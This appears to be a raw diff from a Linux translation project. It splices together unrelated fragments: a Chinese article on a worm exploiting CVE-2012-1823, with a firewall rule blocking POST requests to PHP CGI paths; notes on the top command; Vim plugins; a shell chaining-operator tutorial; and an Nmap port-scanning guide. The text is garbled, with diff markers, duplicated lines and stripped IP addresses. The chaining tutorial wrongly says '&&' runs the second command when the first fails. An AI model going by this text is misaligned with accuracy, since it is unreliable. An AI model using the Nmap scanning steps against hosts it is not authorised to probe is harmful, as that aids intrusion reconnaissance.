“在传播过程中,这段蠕虫代码会随机产生 IP 地址,通过特殊途径,利用普通的用户名密码发送 HTTP POST 请求,探测漏洞”,研究员解释道:“如果一个目标没有打上 CVE-2012-1823 的补丁,这台机器就会从病毒服务器下载蠕虫病毒,之后寻找下一个目标。”
@ -26,13 +27,13 @@
“很多用户也许压根就不知道他们家里或办公室的设备存在漏洞,”啰嗦的研究员说:“我们面临的另一个问题是,即使用户注意到他们用的是有漏洞的设备,这些设备的供应商却没有提供补丁,原因是技术落后,或者完全就是硬件的限制:内存不足,或 CPU 太慢,不足以支持这些软件的新版本。”
“为了保护他们的设备免受蠕虫感染,用户需要确认这些设备是否运行在最新的固件版本上,必要的话,升级固件,设置高强度的管理员密码,在防火墙那儿,或任何独立的设备那儿,屏蔽任何对 -/cgi-bin/php, -/cgi-bin/php5, -/cgi-bin/php-cgi, -/cgi-bin/php.cgi and -/cgi-bin/php4 的 HTTP POST 请求。”没完没了的𧶼门铁克研究员说道。
“为了保护他们的设备免受蠕虫感染,用户需要确认这些设备是否运行在最新的固件版本上,必要的话,升级固件,设置高强度的管理员密码,在防火墙那儿,或任何独立的设备那儿,屏蔽任何对 -/cgi-bin/php, -/cgi-bin/php5, -/cgi-bin/php-cgi, -/cgi-bin/php.cgi and -/cgi-bin/php4 的 HTTP POST 请求。”没完没了的赛门铁克研究员说道。
via: http://www.computerworld.com/s/article/9244409/This_new_worm_targets_Linux_PCs_and_embedded_devices?taxonomyId=122
译者:[bazz2](https://github.com/bazz2) 校对:[校对者ID](https://github.com/校对者ID)
译者:[bazz2](https://github.com/bazz2) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,305 @@
## 1. Top 命令输出: ##
### 1.1 系统运行时间和平均负载: ###
- 当前时间
- 系统已运行的时间
- 当前登录用户的数量
- 相应最近5、10和15分钟内的平均负载。
### 1.2 任务: ###
### 1.3 CPU 状态: ###
下一行显示的是CPU状态。 这里显示了不同模式下的所占CPU时间的百分比。这些不同的CPU时间表示:
- us, user: 运行(未调整优先级的) 用户进程的CPU时间
- sy,system: 运行内核进程的CPU时间
- ni,niced:运行已调整优先级的用户进程的CPU时间
- wa,IO wait: 用于等待IO完成的CPU时间
- hi:处理硬件中断的CPU时间
- si: 处理软件中断的CPU时间
- st:这个虚拟机被hypervisor偷去的CPU时间(译注:如果当前处于一个hypervisor下的vm,实际上hypervisor也是要消耗一部分CPU处理时间的)。
### 1.4 内存使用: ###
### 1.5 字段/列: ###
- D - 不可中断的睡眠态。
- R – 运行态
- S – 睡眠态
- T – 被跟踪或已停止
- Z – 僵尸态
## 2. 交互命令: ##
### 2.1 ‘h’: 帮助 ###
### 2.2 ‘\<ENTER>’ 或者 ‘\<SPACE>’: 刷新显示 ###
### 2.3 ‘A’: 切换交替显示模式 ###
1. Def (默认字段组)
2. Job (任务字段组)
3. Mem (内存字段组)
4. Usr (用户字段组)
我们可以用'a'和'w'在4个 窗口间切换。'a'移到后一个窗口,'w'移到前一个窗口。用'g'命令你可以输入一个数字来选择当前窗口。
### 2.4 ‘B’: 触发粗体显示 ###
### 2.5 ‘d’ 或‘s’: 设置显示的刷新间隔 ###
### 2.6 ‘l’、‘t’、‘m’: 切换负载、任务、内存信息的显示 ###
### 2.7 ‘f’: 字段管理 ###
### 2.8 ‘R’: 反向排序 ###
### 2.9 ‘c’: 触发命令 ###
### 2.10 ‘i’: 空闲任务 ###
### 2.11 ‘V’: 树视图 ###
### 2.12 ‘Z’: 改变配色 ###
### 2.13 ‘z’: 切换彩色显示 ###
### 2.14 ‘x’ 或者 ‘y’ ###
![X 和 Y高亮](http://linoxide.com/wp-content/uploads/2013/11/22.top_x_y_displayed.png)
### 2.15 ‘u’: 特定用户的进程 ###
### 2.16 ‘n’ 或 ‘#’: 任务的数量 ###
### 2.17 ‘k’: 结束任务 ###
### 2.18 ‘r’: 重新设置优先级 ###
## 3. 命令行选项: ##
### 3.1 -b: 批处理模式 ###
### 3.2 -c: 命令/程序名 触发: ###
### 3.3 -d: 设置延迟间隔 ###
$ top -d 1
### 3.4 -i: 切换显示空闲进程 ###
### 3.5 -n: 设置迭代数量 ###
$ top -n 3
### 3.6 -p: 监控特定的PID ###
### 3.7 -u 或 -U: 用户名 或者 UID ###
$ top -p 28453 -u raghu
top: conflicting process selections (U/p/u)
via: http://linoxide.com/linux-command/linux-top-command-examples-screenshots/
译者:[geekpi](https://github.com/geekpi) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
published/Vim is your new IDE.md
Normal file
published/Vim is your new IDE.md
Normal file
@ -0,0 +1,60 @@
- [Tmux速成班][1],这个不错,可以让你快速掌握如何开始使用Tmux。
- 这是我的[tmux.conf配置文件][2],它有一个定制状态栏,可以大大改进颜色主题、优化可读性,里面还有一个必不可少的操作:重设快捷将,因为`Ctrl+b`Vim要用,因此它帮你改为了`Ctrl+a`。
- 其实,[构建优化IDE][3]就像写一个bash脚本一样简单。链接内的例子展示了如何编写一个`.sh`脚本来运行你自己的编程环境。
- [Vundle][4],Vim的插件管理器,用它可以跟踪`.vimrc`文件中的所有插件,还可以进行脚本的一键安装、更新或删除。额,我会告诉你用它还可以直接在Vim里**搜索**插件吗?总之,这个插件扩展绝对是居家旅行、杀人越货之Vim必备佳品。
- [Syntastic][5] 可以检测语法是否正确,写代码的时候要想避免低级错误,这个工具必不可少,它的确能**大大提高**你的代码编写速度。
- [Supertab][6],这款插件可以帮助你使用`<Tab>`实现自动补全。它会搜索当前文档中的所有字符串,然后给出所有的匹配项建议。对写代码带来的好处不只是提升速度,还可以避免很多拼写错误。如果有兴趣,在本文最后一部分**用户推荐**,有此插件的替代品。
- [Ack][7],99%的用户会选择用它代替grep。它完美集成在Vim里,用户可以直接用它搜索项目文件,搜索结果则显示在一个独立的窗口里。在本文最后一部分**用户推荐**,也有此插件的替代品。
- [CtrlP][8] 能够极快的模糊搜索全路径文件、缓冲区、“最近使用”(MRU)和标签等等,纯粹用`VimL`写成,专为Vim搜索。
- [NERDTree][9] 可以帮你浏览整个文件系统、打开文件或目录。它以树形结构显示整个文件系统,支持键盘操作和简单的文件系统操作。
- [Sparkup][10]可以帮助你更快的编写HTML代码。支持**类CSS语法**和**完整的HTML扩展**代码。在本文最后一部分**用户推荐**,也有此插件的替代品。
- [Vimux][11]可以帮你在Vim中与Tmux进行交互。例如在不需要离开Vim的情况下进行测试、编写脚本、建立任务等。
- [《自动安装Vundle》][12]这篇文章介绍了在`.vimrc`配置文件中只需添加几行`VimL`脚本,这样每次你在一个新环境中运行Vim的时候,它就能自动安装Vundle及所有关联包。在你拷贝Vim配置文件到一个新环境或新的服务器时,这是非常有用的。
- [一名开发者的成功故事][13]介绍了他是如何告别他曾经最信任的**MacBook Pro**,并改用iPad + Linode在云上开始开发工作。
- [YouCompleteMe][14],由Reddit用户hnasarat推荐。它安装起来稍微麻烦一些,但是支持非常强大的语法补全,包括C、Ruby、Python、PHP等许多语言。
- [Ag][15],由*gckjk*推荐,大多数Reddit用户都知道它,这是升级版的`ack`,速度快了3到5倍。它能读取 `.gitignore`和 `.hgignore`,或者`.agignore`,从而忽略一些被版本控制软件所忽略的匹配文件(译注:不加入版本库的文件,我想你大多数时候没有搜索它的意图)。
- [Emmet][16],由另一个资深reddit用户*damnated*推荐。这是一款`Sparkup`的替代品,可以非常方便快速地用标签标记字符串。链接里有示例演示视频。
- [Unite][17]由网友 basetta推荐,它可以作为前面多个插件的集大成者。你可以用它搜索文件(就像`CtrlP`),搜索文档内容(就像`ack`或`ag`),还可以在下拉历史或缓冲区间进行自由移动和切换。所有这些功能都集成在了这一个插件里,非常方便!
via: http://devcharm.com/pages/18-vim-is-your-new-ide
译者:[Mr小眼儿](http://blog.csdn.net/tinyeyeser) 校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,162 @@
10 Useful Chaining Operators in Linux with Practical Examples
Chaining of Linux commands means, combining several commands and make them execute based upon the behaviour of operator used in between them. Chaining of commands in Linux, is something like you are writing [short shell scripts][1] at the shell itself, and executing them from the terminal directly. Chaining makes it possible to automate the process. Moreover, an unattended machine can function in a much systematic way with the help of chaining operators.
![10 Chaining Operators in Linux](http://www.tecmint.com/wp-content/uploads/2013/12/Chaining-Operators-in-Linux.png)
*10 Chaining Operators in Linux*
This Article aims at throwing light on frequently used **command-chaining operators**, with short descriptions and corresponding examples which surely will increase your productivity and lets you write short and meaningful codes beside reducing system load, at times.
### 1. Ampersand Operator (&) ###
The function of ‘**&**‘ is to make the command run in background. Just type the command followed with a white space and ‘**&**‘. You can execute more than one command in the background, in a single go.
Run one command in the background:
tecmint@localhost:~$ ping c5 www.tecmint.com &
Run two command in background, simultaneously:
root@localhost:/home/tecmint# apt-get update & apt-get upgrade &
### 2. semi-colon Operator (;) ###
The semi-colon operator makes it possible to run, several commands in a single go and the execution of command occurs sequentially.
root@localhost:/home/tecmint# apt-get update ; apt-get upgrade ; mkdir test
The above command combination will first execute **update** instruction, then **upgrade** instruction and finally will create a ‘**test**‘ directory under the current working directory.
### 3. AND Operator (&&) ###
The **AND Operator (&&)** would execute the second command only, if the execution of first command fails, i.e., the exit status of the first command is **1**. This command is very useful in checking the execution status of last command.
For example, I want to visit website **tecmint.com** using **[links command][2]**, in terminal but before that I need to check if the host is **live** or **not**.
root@localhost:/home/tecmint# ping -c3 www.tecmint.com && links www.tecmint.com
### 4. OR Operator (||) ###
The **OR Operator (||)** is much like an ‘**else**‘ statement in programming. The above operator allow you to execute second command only if the execution of first command fails, i.e., the exit status of first command is ‘**1**‘.
For example, I want to execute ‘**apt-get update**‘ from non-root account and if the first command fails, then the second ‘**links www.tecmint.com**‘ command will execute.
tecmint@localhost:~$ apt-get update || links tecmint.com
In the above command, since the **user** was not allowed to **update** system, it means that the exit status of first command is ’**1**′ and hence the last command ‘**links tecmint.com**‘ gets executed.
What if the first command is executed successfully, with an exit status ‘**0**‘? Obviously! Second command won’t execute.
tecmint@localhost:~$ mkdir test || links tecmint.com
Here, the user creates a folder ‘**test**‘ in his home directory, for which user is permitted. The command executed successfully giving an exit status ‘**0**‘ and hence the last part of the command is not executed.
### 5. NOT Operator (!) ###
The **NOT Operator (!)** is much like an ‘**except**‘ statement. This command will execute all except the condition provided. To understand this, create a directory ‘**tecmint**‘ in your home directory and ‘**cd**‘ to it.
tecmint@localhost:~$ mkdir tecmint
tecmint@localhost:~$ cd tecmint
Next, create several types of files in the folder ‘**tecmint**‘.
tecmint@localhost:~/tecmint$ touch a.doc b.doc a.pdf b.pdf a.xml b.xml a.html b.html
See we’ve created all the new files within the folder ‘**tecmint**‘.
tecmint@localhost:~/tecmint$ ls
a.doc a.html a.pdf a.xml b.doc b.html b.pdf b.xml
Now delete all the files except ‘**html**‘ file all at once, in a smart way.
tecmint@localhost:~/tecmint$ rm -r !(*.html)
Just to verify, last execution. List all of the available files using [ls command][3].
tecmint@localhost:~/tecmint$ ls
a.html b.html
### 6. AND – OR operator (&& – ||) ###
The above operator is actually a combination of ‘**AND**‘ and ‘**OR**‘ Operator. It is much like an ‘**if-else**‘ statement.
For example, let’s do ping to **tecmint.com**, if success echo ‘**Verified**‘ else echo ‘**Host Down**‘.
tecmint@localhost:~/tecmint$ ping -c3 www.tecmint.com && echo "Verified" || echo "Host Down"
#### Sample Output ####
PING www.tecmint.com ( 56(84) bytes of data.
64 bytes from www.tecmint.com ( icmp_req=1 ttl=55 time=216 ms
64 bytes from www.tecmint.com ( icmp_req=2 ttl=55 time=224 ms
64 bytes from www.tecmint.com ( icmp_req=3 ttl=55 time=226 ms
--- www.tecmint.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2001ms
rtt min/avg/max/mdev = 216.960/222.789/226.423/4.199 ms
Now, disconnect your internet connection, and try same command again.
tecmint@localhost:~/tecmint$ ping -c3 www.tecmint.com && echo "verified" || echo "Host Down"
#### Sample Output ####
ping: unknown host www.tecmint.com
Host Down
### 7. PIPE Operator (|) ###
This **PIPE** operator is very useful where the output of first command acts as an input to the second command. For example, pipeline the output of ‘**ls -l**‘ to ‘**less**‘ and see the output of the command.
tecmint@localhost:~$ ls -l | less
### 8. Command Combination Operator {} ###
Combine two or more commands, the second command depends upon the execution of the first command.
For example, check if a file ‘**xyz.txt**‘ and ‘**xyz1.txt**‘ is available under my **Downloads** directory or not, and output corresponding output.
tecmint@localhost:~$ [ -f /home/tecmint/Downloads/xyz.txt ] || echo “The file does not exist”
tecmint@localhost:~$ [ -f /home/tecmint/Downloads/xyz1.txt ] || echo “The file does not exist”
“The file does not exist”
### 9. Precedence Operator () ###
The Operator makes it possible to execute command in precedence order.
Command_x1 &&Command_x2 || Command_x3 && Command_x4.
In the above pseudo command, what if the **Command_x1** fails? Neither of the **Command_x2**, **Command_x3**, **Command_x4** would executed, for this we use **Precedence Operator**, as:
(Command_x1 &&Command_x2) || (Command_x3 && Command_x4)
In the above pseudo command, if **Command_x1** fails, **Command_x2** also fails but Still **Command_x3** and **Command_x4** executes depends upon exit status of **Command_x3**.
### 10. Concatenation Operator (\) ###
The **Concatenation Operator (\)** as the name specifies, is used to concatenate large commands over several lines in the shell. For example, The below command will open text file **test(1).txt**.
tecmint@localhost:~/Downloads$ nano test\(1\).txt
That’s all for now. I am coming up with another interesting article very soon. Till then Stay tuned, healthy and connected to **Tecmint**. Don’t forget to give your Valuable feedback in our comment section.
via: http://www.tecmint.com/chaining-operators-in-linux-with-practical-examples/
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本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,3 +1,4 @@
[this is bazz2]
10 basic examples of linux netstat command
### Netstat ###
@ -0,0 +1,646 @@
29 Practical Examples of Nmap Commands for Linux System/Network Administrators
The **Nmap** aka **Network Mapper** is an open source and a very versatile tool for Linux system/network administrators. **Nmap** is used for **exploring networks, perform security scans, network audit** and **finding open ports** on remote machine. It scans for Live hosts, Operating systems, packet filters and open ports running on remote hosts.
![Nmap Commands](http://www.tecmint.com/wp-content/uploads/2013/12/Nmap-Commands.png)
*Nmap Commands and Examples*
I’ll be covering most of **NMAP** usage in two different parts and this is the first part of nmap serious. Here in this setup, I have used two servers without firewall to test the working of the Nmap command.
- – server1.tecmint.com
- – server2.tecmint.com
### Nmap command usage ###
# nmap [Scan Type(s)] [Options] {target specification}
### How to Install NMAP in Linux ###
Most of the today’s Linux distributions like **Red Hat, CentOS, Fedoro, Debian** and **Ubuntu** have included **Nmap** in their default package management repositories called [Yum][1] and [APT][2]. The both tools are used to install and manage software packages and updates. To install **Nmap** on distribution specific use the following command.
# yum install nmap [on Red Hat based systems]
$ sudo apt-get install nmap [on Debian based systems]
Once you’ve install latest nmap application, you can follow the example instructions provided in this article.
### 1. Scan a System with Hostname and IP Address ###
The **Nmap** tool offers various methods to scan a system. In this example, I am performing a scan using hostname as **server2.tecmint.com** to find out all open ports, services and MAC address on the system.
#### Scan using Hostname ####
[root@server1 ~]# nmap server2.tecmint.com
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:42 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.415 seconds
You have new mail in /var/spool/mail/root
#### Scan using IP Address ####
[root@server1 ~]# nmap
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 11:04 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.465 seconds
You have new mail in /var/spool/mail/root
### 2. Scan using “-v” option ###
You can see that the below command with “**-v**” option is giving more detailed information about the remote machine.
[root@server1 ~]# nmap -v server2.tecmint.com
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 15:43 EST
Initiating ARP Ping Scan against [1 port] at 15:43
The ARP Ping Scan took 0.01s to scan 1 total hosts.
Initiating SYN Stealth Scan against server2.tecmint.com ( [1680 ports] at 15:43
Discovered open port 22/tcp on
Discovered open port 80/tcp on
Discovered open port 8888/tcp on
Discovered open port 111/tcp on
Discovered open port 3306/tcp on
Discovered open port 957/tcp on
The SYN Stealth Scan took 0.30s to scan 1680 total ports.
Host server2.tecmint.com ( appears to be up ... good.
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.485 seconds
Raw packets sent: 1681 (73.962KB) | Rcvd: 1681 (77.322KB)
#### Scan Multiple Hosts ####
You can scan multiple hosts by simply writing their IP addresses or hostnames with Nmap.
[root@server1 ~]# nmap
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:06 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 3 IP addresses (1 host up) scanned in 0.580 seconds
### 4. Scan a whole Subnet ###
You can scan a whole subnet or IP range with Nmap by providing *** wildcard** with it.
[root@server1 ~]# nmap 192.168.0.*
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:11 EST
Interesting ports on server1.tecmint.com (
Not shown: 1677 closed ports
22/tcp open ssh
111/tcp open rpcbind
851/tcp open unknown
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 256 IP addresses (2 hosts up) scanned in 5.550 seconds
You have new mail in /var/spool/mail/root
On above output you can see that nmap scanned a whole subnet and gave the information about those hosts which are **Up** in the **Network**.
### 5. Scan Multiple Servers using last octet of IP address ###
You can perform scans on multiple IP address by simple specifying last octet of IP address. For example, here I performing a scan on IP addresses, and
[root@server1 ~]# nmap,102,103
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:09 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 3 IP addresses (1 host up) scanned in 0.552 seconds
You have new mail in /var/spool/mail/root
### 6. Scan list of Hosts from a File ###
If you have more hosts to scan and all host details are written in a file , you can directly ask nmap to read that file and perform scans. Let’s see how to do that.
Create a text file called “**nmaptest.txt**” and define all the IP addresses or hostname of the server that you want to do a scan.
[root@server1 ~]# cat > nmaptest.txt
Next, run the following command with “**iL**” option with nmap command to scan all listed IP address in the file.
[root@server1 ~]# nmap -iL nmaptest.txt
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 10:58 EST
Interesting ports on localhost.localdomain (
Not shown: 1675 closed ports
22/tcp open ssh
25/tcp open smtp
111/tcp open rpcbind
631/tcp open ipp
857/tcp open unknown
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
958/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 3 IP addresses (3 hosts up) scanned in 2.047 seconds
### 7. Scan an IP Address Range ###
You can specify an IP range while performing scan with Nmap.
[root@server1 ~]# nmap
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:09 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 10 IP addresses (1 host up) scanned in 0.542 seconds
### 8. Scan Network Excluding Remote Hosts ###
You can exclude some hosts while performing a full network scan or when you are scanning with wildcards with “**–exclude**” option.
[root@server1 ~]# nmap 192.168.0.* --exclude
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:16 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 255 IP addresses (1 host up) scanned in 5.313 seconds
You have new mail in /var/spool/mail/root
### 9. Scan OS information and Traceroute ###
With Nmap, you can detect which OS and version is running on the remote host. To enable OS & version detection, script scanning and traceroute, we can use “**-A**” option with NMAP.
[root@server1 ~]# nmap -A
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:25 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
111/tcp open rpcbind 2 (rpc #100000)
957/tcp open status 1 (rpc #100024)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
Uptime 0.169 days (since Mon Nov 11 12:22:15 2013)
Nmap finished: 1 IP address (1 host up) scanned in 22.271 seconds
You have new mail in /var/spool/mail/root
In above Output, you can see that nmap is came up with TCP/IP fingerprint of the OS running on remote hosts and being more specific about the port and services running on the remote hosts.
### 10. Enable OS Detection with Nmap ###
Use the option “-O” and “-osscan-guess” also helps to discover OS information.
[root@server1 ~]# nmap -O server2.tecmint.com
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:40 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=Option -O and -osscan-guess also helps to discover OSR%Ops=)
Uptime 0.221 days (since Mon Nov 11 12:22:16 2013)
Nmap finished: 1 IP address (1 host up) scanned in 11.064 seconds
You have new mail in /var/spool/mail/root
### 11. Scan a Host to Detect Firewall ###
The below command will perform a scan on a remote host to detect if any packet filters or Firewall is used by host.
[root@server1 ~]# nmap -sA
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:27 EST
All 1680 scanned ports on server2.tecmint.com ( are UNfiltered
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.382 seconds
You have new mail in /var/spool/mail/root
### 12. Scan a Host to check its protected by Firewall ###
To scan a host if it is protected by any packet filtering software or Firewalls.
[root@server1 ~]# nmap -PN
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:30 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.399 seconds
### 13. Find out Live hosts in a Network ###
With the help of “**-sP**” option we can simply check which hosts are live and up in Network, with this option nmap skips port detection and other things.
[root@server1 ~]# nmap -sP 192.168.0.*
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 11:01 EST
Host server1.tecmint.com ( appears to be up.
Host server2.tecmint.com ( appears to be up.
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 256 IP addresses (2 hosts up) scanned in 5.109 seconds
### 14. Perform a Fast Scan ###
You can perform a fast scan with “**-F**” option to scans for the ports listed in the nmap-services files and leaves all other ports.
[root@server1 ~]# nmap -F
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:47 EST
Interesting ports on server2.tecmint.com (
Not shown: 1234 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.322 seconds
### 15. Find Nmap version ###
You can find out Nmap version you are running on your machine with “**-V**” option.
[root@server1 ~]# nmap -V
Nmap version 4.11 ( http://www.insecure.org/nmap/ )
You have new mail in /var/spool/mail/root
### 16. Scan Ports Consecutively ###
Use the “**-r**” flag to don’t randomize.
[root@server1 ~]# nmap -r
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:52 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
957/tcp open unknown
3306/tcp open mysql
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.363 seconds
17. Print Host interfaces and Routes
You can find out host interface and route information with nmap by using “**–iflist**” option.
[root@server1 ~]# nmap --iflist
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:07 EST
lo (lo) loopback up
eth0 (eth0) ethernet up 08:00:27:11:C7:89
|||| eth0
|||| eth0
In above output, you can see that map is listing interfaces attached to your system and their respective routes.
### 18. Scan for specific Port ###
There are various options to discover ports on remote machine with Nmap. You can specify the port you want nmap to scan with “**-p**” option, by default nmap scans only **TCP** ports.
[root@server1 ~]# nmap -p 80 server2.tecmint.com
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:12 EST
Interesting ports on server2.tecmint.com (
80/tcp open http
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) sca
### 19. Scan a TCP Port ###
You can also specify specific port types and numbers with nmap to scan.
[root@server1 ~]# nmap -p T:8888,80 server2.tecmint.com
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:15 EST
Interesting ports on server2.tecmint.com (
80/tcp open http
8888/tcp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.157 seconds
### 20. Scan a UDP Port ###
[root@server1 ~]# nmap -sU 53 server2.tecmint.com
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:15 EST
Interesting ports on server2.tecmint.com (
53/udp open http
8888/udp open sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.157 seconds
### 21. Scan Multiple Ports ###
You can also scan multiple ports using option “**-p**“.
[root@server1 ~]# nmap -p 80,443
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-18 10:56 EST
Interesting ports on server2.tecmint.com (
80/tcp open http
443/tcp closed https
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 0.190 seconds
### 22. Scan Ports by Network Range ###
You can scan ports with ranges using expressions.
[root@server1 ~]# nmap -p 80-160
### 23. Find Host Services version Numbers ###
We can find out service’s versions which are running on remote hosts with “**-sV**” option.
[root@server1 ~]# nmap -sV
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:48 EST
Interesting ports on server2.tecmint.com (
Not shown: 1674 closed ports
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((CentOS))
111/tcp open rpcbind 2 (rpc #100000)
957/tcp open status 1 (rpc #100024)
3306/tcp open mysql MySQL (unauthorized)
8888/tcp open http lighttpd 1.4.32
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
Nmap finished: 1 IP address (1 host up) scanned in 12.624 seconds
#### 24. Scan remote hosts using TCP ACK (PA) and TCP Syn (PS) ####
Sometimes packet filtering firewalls blocks standard **ICMP** ping requests, in that case, we can use **TCP ACK** and **TCP Syn** methods to scan remote hosts.
[root@server1 ~]# nmap -PS
